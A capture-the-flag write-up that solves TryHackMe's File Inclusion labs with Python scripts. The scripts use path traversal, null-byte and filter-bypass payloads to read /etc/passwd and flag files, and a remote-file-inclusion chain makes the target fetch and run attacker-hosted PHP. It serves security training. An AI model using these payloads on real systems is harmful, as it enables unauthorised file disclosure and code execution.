TryHackMe — File Inclusion (Using python)
2023-09-18 12:40:26 — Source: infosecwriteups.com (original article)

Gowthamaraj Rajendran (@fuffsec)

InfoSec Write-ups

Link: https://tryhackme.com/room/fileinc

This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.

I have solved all the challenges using Python, so feel free to run the code and check whether it works for you as well. Note that every script hard-codes the lab VM address (10.10.72.183) and the RFI script also hard-codes the attacking machine (10.13.22.219:8000); both change with each deployment, so replace them with your own addresses before running.

Task 1 Introduction

Task 2 Deploy the VM

Task 3 Path Traversal

Task 4 Local File Inclusion — LFI

Lab #1

  • Use the code below to get the flag
import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

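def LFI(url, parameter):
    """Confirm a local file inclusion on ``url`` via ``parameter`` and dump /etc/passwd.

    Two requests are made. The first sends an empty ``parameter`` value; on this
    lab that makes PHP emit an ``include()`` warning into the page (visible only
    because the target displays PHP errors), which is taken as confirmation.
    The second includes ``/etc/passwd`` by absolute path - no traversal is
    needed for lab1. The lab renders the included file inside a ``<code>``
    element; the second capture is used because the original script indexed
    ``matches[1]`` (the first capture presumably holds the warning text).

    Returns the dumped file as text, or ``None`` when the warning is absent or
    the page has no second ``<code>`` element (the original raised ``IndexError``).
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    if not include_warning_present(probe):
        print("*** No include() warning in the response - LFI not confirmed ***")
        return None
    print("*** Found LFI***")
    response = requests.get(f"{url}?{parameter}=/etc/passwd", timeout=10)
    dumped = decode_match(pattern.findall(response.content), index=1)
    if dumped is None:
        print("*** LFI confirmed, but the response had no second <code> block ***")
        return None
    print(dumped)
    return dumped


def include_warning_present(response):
    """True when ``response`` is a 200 whose body contains both ``Warning`` and ``include()``."""
    body = response.content
    return response.status_code == 200 and b"Warning" in body and b"include()" in body


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")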

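def main(ip='10.10.72.183'):
    """Check that the lab host answers on HTTP, then run the LFI probe against lab1.php.

    ``ip`` defaults to the VM address used in the write-up; pass the address of
    your own deployment (it changes every time the room is started).
    Connection failures and timeouts print an error instead of a traceback.
    """
    base = 'http://' + ip + '/'
    try:
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab1.php', 'file')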

# Run the lab script only when executed directly, not when imported.
if __name__ == '__main__':
    main()

Lab #2

import requests
import re
# Captures the path PHP reports in its include() warning, up to the HTML-escaped
# quote (&quot;) that the injected value turns into; DOTALL in case the message wraps.
pattern = re.compile(rb"include\((.*?)/&quot;", flags=re.DOTALL)

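def LFI(url, parameter):
    """Leak the include directory of lab2.php through PHP's own error message.

    An empty ``parameter`` value first confirms that the page emits an
    ``include()`` warning (visible only because the target displays PHP
    errors). A lone double quote is then sent as the value: the resulting
    warning echoes the path PHP tried to open, and ``pattern`` captures what
    sits between ``include(`` and the HTML-escaped quote (``/&quot;``) - the
    directory the page prepends to the parameter.

    Returns the captured directory as text, or ``None`` when no warning is
    present or the message does not match (the original raised ``IndexError``).
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    if not include_warning_present(probe):
        print("*** No include() warning in the response - nothing to leak ***")
        return None
    print("*** Found Folder***")
    payload = '"'
    response = requests.get(f"{url}?{parameter}={payload}", timeout=10)
    folder = decode_match(pattern.findall(response.content), index=0)
    if folder is None:
        print("*** Warning found, but the include() path did not match the pattern ***")
        return None
    print(folder)
    return folder


def include_warning_present(response):
    """True when ``response`` is a 200 whose body contains both ``Warning`` and ``include()``."""
    body = response.content
    return response.status_code == 200 and b"Warning" in body and b"include()" in body


def decode_match(matches, index=0):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")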

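def main(ip='10.10.72.183'):
    """Check that the lab host answers on HTTP, then run the folder-leak probe against lab2.php.

    ``ip`` defaults to the VM address used in the write-up; pass the address of
    your own deployment (it changes every time the room is started).
    Connection failures and timeouts print an error instead of a traceback.
    """
    base = 'http://' + ip + '/'
    try:
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab2.php', 'file')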

# Run the lab script only when executed directly, not when imported.
if __name__ == '__main__':
    main()

Task 5 Local File Inclusion — LFI #2

Lab #3

import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

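def LFI(url, parameter):
    """Confirm an LFI on lab3.php and dump /etc/passwd using traversal plus a null byte.

    An empty ``parameter`` value first confirms that the page emits an
    ``include()`` warning (visible only because the target displays PHP
    errors). The payload then walks up four directories and ends in ``%00``:
    on PHP builds that still honour null-byte truncation (removed in 5.3.4)
    everything the script appends after the user input - typically a forced
    extension - is cut off. The trick therefore only works against old PHP
    like this lab's, not against current releases. The included file is read
    from the second ``<code>`` element, as the original ``matches[1]`` did.

    Returns the dumped file as text, or ``None`` when the warning is absent or
    the page has no second ``<code>`` element (the original raised ``IndexError``).
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    if not include_warning_present(probe):
        print("*** No include() warning in the response - LFI not confirmed ***")
        return None
    print("*** Found LFI***")
    # '%00' is sent already percent-encoded; requests keeps valid escapes as-is.
    payload = '../../../../etc/passwd%00'
    response = requests.get(f"{url}?{parameter}={payload}", timeout=10)
    dumped = decode_match(pattern.findall(response.content), index=1)
    if dumped is None:
        print("*** LFI confirmed, but the response had no second <code> block ***")
        return None
    print(dumped)
    return dumped


def include_warning_present(response):
    """True when ``response`` is a 200 whose body contains both ``Warning`` and ``include()``."""
    body = response.content
    return response.status_code == 200 and b"Warning" in body and b"include()" in body


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")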

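def main(ip='10.10.72.183'):
    """Check that the lab host answers on HTTP, then run the LFI probe against lab3.php.

    ``ip`` defaults to the VM address used in the write-up; pass the address of
    your own deployment (it changes every time the room is started).
    Connection failures and timeouts print an error instead of a traceback.
    """
    base = 'http://' + ip + '/'
    try:
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab3.php', 'file')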

# Run the lab script only when executed directly, not when imported.
if __name__ == '__main__':
    main()

Lab #4

import requests

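def LFI(url, parameter):
    """Report whether lab4.php reveals ``file_get_contents`` as the function it uses.

    Lab4 only asks for the name of the PHP function behind the inclusion, so no
    file is read: the page is requested with an empty ``parameter`` value and
    the response body is searched for ``file_get_contents`` (the name shows up
    because the target displays PHP errors).

    Returns ``True`` when the function name was found, ``False`` otherwise
    (the original printed nothing in that case).
    """
    response = requests.get(f"{url}?{parameter}=", timeout=10)
    found = mentions_file_get_contents(response)
    if found:
        print("*** Found Function***")
        print("file_get_contents")
    else:
        print("*** file_get_contents not mentioned in the response ***")
    return found


def mentions_file_get_contents(response):
    """True when ``response`` is a 200 whose body contains ``file_get_contents``."""
    return response.status_code == 200 and b"file_get_contents" in response.content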

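def main(ip='10.10.72.183'):
    """Check that the lab host answers on HTTP, then run the function-name probe against lab4.php.

    ``ip`` defaults to the VM address used in the write-up; pass the address of
    your own deployment (it changes every time the room is started).
    Connection failures and timeouts print an error instead of a traceback.
    """
    base = 'http://' + ip + '/'
    try:
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab4.php', 'file')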

# Run the lab script only when executed directly, not when imported.
if __name__ == '__main__':
    main()

Lab #5

import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

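def LFI(url, parameter):
    """Confirm an LFI on lab5.php and dump /etc/passwd past a ``../`` stripping filter.

    An empty ``parameter`` value first confirms that the page emits an
    ``include()`` warning (visible only because the target displays PHP
    errors). The payload uses ``....//`` instead of ``../``: a filter that
    removes ``../`` once (non-recursively) turns each ``....//`` back into
    ``../``, so the traversal survives. That this is lab5's filter is inferred
    from the payload shape, not from visible server code. The included file
    is read from the second ``<code>`` element, as the original ``matches[1]`` did.

    Returns the dumped file as text, or ``None`` when the warning is absent or
    the page has no second ``<code>`` element (the original raised ``IndexError``).
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    if not include_warning_present(probe):
        print("*** No include() warning in the response - LFI not confirmed ***")
        return None
    print("*** Found LFI***")
    payload = '....//....//....//....//etc/passwd'
    response = requests.get(f"{url}?{parameter}={payload}", timeout=10)
    dumped = decode_match(pattern.findall(response.content), index=1)
    if dumped is None:
        print("*** LFI confirmed, but the response had no second <code> block ***")
        return None
    print(dumped)
    return dumped


def include_warning_present(response):
    """True when ``response`` is a 200 whose body contains both ``Warning`` and ``include()``."""
    body = response.content
    return response.status_code == 200 and b"Warning" in body and b"include()" in body


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")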

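def main(ip='10.10.72.183'):
    """Check that the lab host answers on HTTP, then run the LFI probe against lab5.php.

    ``ip`` defaults to the VM address used in the write-up; pass the address of
    your own deployment (it changes every time the room is started).
    Connection failures and timeouts print an error instead of a traceback.
    """
    base = 'http://' + ip + '/'
    try:
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab5.php', 'file')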

# Run the lab script only when executed directly, not when imported.
if __name__ == '__main__':
    main()

Lab #6

import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

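def LFI(url, parameter):
    """Read /etc/os-release through lab6.php by satisfying its path prefix, then traversing out.

    Unlike the earlier labs, an empty ``parameter`` value here returns a page
    containing ``Access Denied`` rather than a PHP warning, so that string is
    used as the fingerprint. The payload starts with ``THM-profile/`` - which
    presumably is the prefix the page insists on (inferred from the payload,
    the server code is not visible) - and then walks up with ``../`` to reach
    ``/etc/os-release``. The included file is read from the second ``<code>``
    element, as the original ``matches[1]`` did.

    Returns the dumped file as text, or ``None`` when the fingerprint is absent
    or the page has no second ``<code>`` element (the original raised ``IndexError``).
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=10)
    if not access_denied_present(probe):
        print("*** No 'Access Denied' in the response - lab6 fingerprint not found ***")
        return None
    print("*** Found LFI***")
    payload = 'THM-profile/../../../../etc/os-release'
    response = requests.get(f"{url}?{parameter}={payload}", timeout=10)
    dumped = decode_match(pattern.findall(response.content), index=1)
    if dumped is None:
        print("*** Fingerprint matched, but the response had no second <code> block ***")
        return None
    print(dumped)
    return dumped


def access_denied_present(response):
    """True when ``response`` is a 200 whose body contains ``Access Denied``."""
    return response.status_code == 200 and b"Access Denied" in response.content


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")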

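def main(ip='10.10.72.183'):
    """Check that the lab host answers on HTTP, then run the LFI probe against lab6.php.

    ``ip`` defaults to the VM address used in the write-up; pass the address of
    your own deployment (it changes every time the room is started).
    Connection failures and timeouts print an error instead of a traceback.
    """
    base = 'http://' + ip + '/'
    try:
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab6.php', 'file')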

# Run the lab script only when executed directly, not when imported.
if __name__ == '__main__':
    main()

Task 6 Remote File Inclusion — RFI

Task 7 Remediation

Task 8 Challenge

flag1

import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

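def main(ip='10.10.72.183'):
    """Fetch flag1 by POSTing ``file=/etc/flag1`` to chall1.php and printing the included file.

    This challenge takes the path in the POST body rather than the query
    string. ``ip`` is the lab VM address and changes with every deployment.
    The included file is expected in the second ``<code>`` element of the
    page (the original indexed ``matches[1]``); when it is missing a message
    is printed instead of raising ``IndexError``.

    Returns the flag text, or ``None`` when it could not be extracted.
    """
    url = f'http://{ip}/challenges/chall1.php'
    response = requests.post(url, data={"file": "/etc/flag1"}, timeout=10)
    flag = decode_match(pattern.findall(response.content), index=1)
    if flag is None:
        print("No second <code> block in the response - check the target and payload")
        return None
    print(flag)
    return flag


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")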

# Run the challenge script only when executed directly, not when imported.
if __name__ == "__main__":
    main()

flag2

import requests
import re
# chall2 nests a </div> inside the <code> element before the flag; the greedy .*
# skips past the last </div> so only the text after it is captured.
pattern = re.compile(rb"<code>.*</div>(.*?)</code>", flags=re.DOTALL)

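def main(ip='10.10.72.183'):
    """Fetch flag2 by smuggling the traversal through the ``THM`` cookie of chall2.php.

    chall2 reads the file path from a cookie instead of a request parameter.
    The value traverses up four directories and ends in ``%00``; cookie values
    are sent verbatim, so the server side presumably URL-decodes it before the
    null byte can truncate the path (which only works on old PHP builds).
    ``ip`` is the lab VM address and changes with every deployment. The flag
    is taken from the first match of ``pattern`` (the original used
    ``matches[0]``); a missing match prints a message instead of raising
    ``IndexError``.

    Returns the flag text, or ``None`` when it could not be extracted.
    """
    url = f'http://{ip}/challenges/chall2.php'
    cookie = {"THM": "../../../../etc/flag2%00"}
    response = requests.get(url, cookies=cookie, timeout=10)
    flag = decode_match(pattern.findall(response.content), index=0)
    if flag is None:
        print("Pattern did not match the response - check the target and cookie value")
        return None
    print(flag)
    return flag


def decode_match(matches, index=0):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")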

# Run the challenge script only when executed directly, not when imported.
if __name__ == "__main__":
    main()

flag3

import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

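def main(ip='10.10.72.183'):
    """Fetch flag3 by POSTing a traversal path with a raw NUL byte to chall3.php.

    Unlike flag2, the terminator here is a literal ``\\x00`` inside the form
    value; ``requests`` form-encodes it as ``%00`` on the wire. The null byte
    truncates whatever the script appends to the path, which only works on
    PHP builds predating the 5.3.4 fix. ``ip`` is the lab VM address and
    changes with every deployment. The flag is expected in the second
    ``<code>`` element (the original indexed ``matches[1]``); a missing
    element prints a message instead of raising ``IndexError``.

    Returns the flag text, or ``None`` when it could not be extracted.
    """
    url = f'http://{ip}/challenges/chall3.php'
    response = requests.post(url, data={"file": "../../../../etc/flag3\x00"}, timeout=10)
    flag = decode_match(pattern.findall(response.content), index=1)
    if flag is None:
        print("No second <code> block in the response - check the target and payload")
        return None
    print(flag)
    return flag


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")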

# Run the challenge script only when executed directly, not when imported.
if __name__ == "__main__":
    main()

RCE (via RFI — the target is made to include a PHP file served from the attacking machine, so the code runs on the lab box)

rce.txt — hosted on the attacking machine (e.g. `python3 -m http.server 8000` in the directory containing it, so it is reachable at http://10.13.22.219:8000/rce.txt as used in rce.py below)

<?PHP
// Executed on the TARGET once playground.php includes this file over HTTP
// (remote file inclusion): runs `hostname` on the lab box and echoes the
// output into the page, which rce.py then extracts.
echo system('hostname')
?>

rce.py

import requests
import re
# One capture per <code>…</code> element of the page; DOTALL lets a capture span lines.
pattern = re.compile(rb"<code>(.*?)</code>", flags=re.DOTALL)

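def main(ip='10.10.72.183', attacker='10.13.22.219:8000'):
    """Trigger the RFI in playground.php and print the output of the remotely hosted rce.txt.

    ``file`` is pointed at ``http://<attacker>/rce.txt``, which must be served
    by the attacking machine; the target fetches it and executes it as PHP
    (this requires ``allow_url_include`` to be enabled on the target, which is
    why RFI is rarer than LFI in practice). The ``hostname`` command in
    rce.txt therefore runs on the lab box. ``ip`` and ``attacker`` both change
    with every deployment. The command output is expected in the second
    ``<code>`` element (the original indexed ``matches[1]``); a missing
    element prints a message instead of raising ``IndexError``.

    Returns the extracted output, or ``None`` when it could not be extracted.
    """
    url = f'http://{ip}/playground.php?file=http://{attacker}/rce.txt'
    response = requests.get(url, timeout=10)
    output = decode_match(pattern.findall(response.content), index=1)
    if output is None:
        print("No second <code> block in the response - is rce.txt being served and is allow_url_include on?")
        return None
    print(output)
    return output


def decode_match(matches, index=1):
    """Decode capture ``index`` of ``matches`` as UTF-8, or return ``None`` when it is missing."""
    if index >= len(matches):
        return None
    return matches[index].decode("utf-8", errors="replace")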

# Run the RFI script only when executed directly, not when imported.
if __name__ == "__main__":
    main()

Hooray!!!

Please give me a clap if you found it to be helpful and follow me to get more Security knowledge.

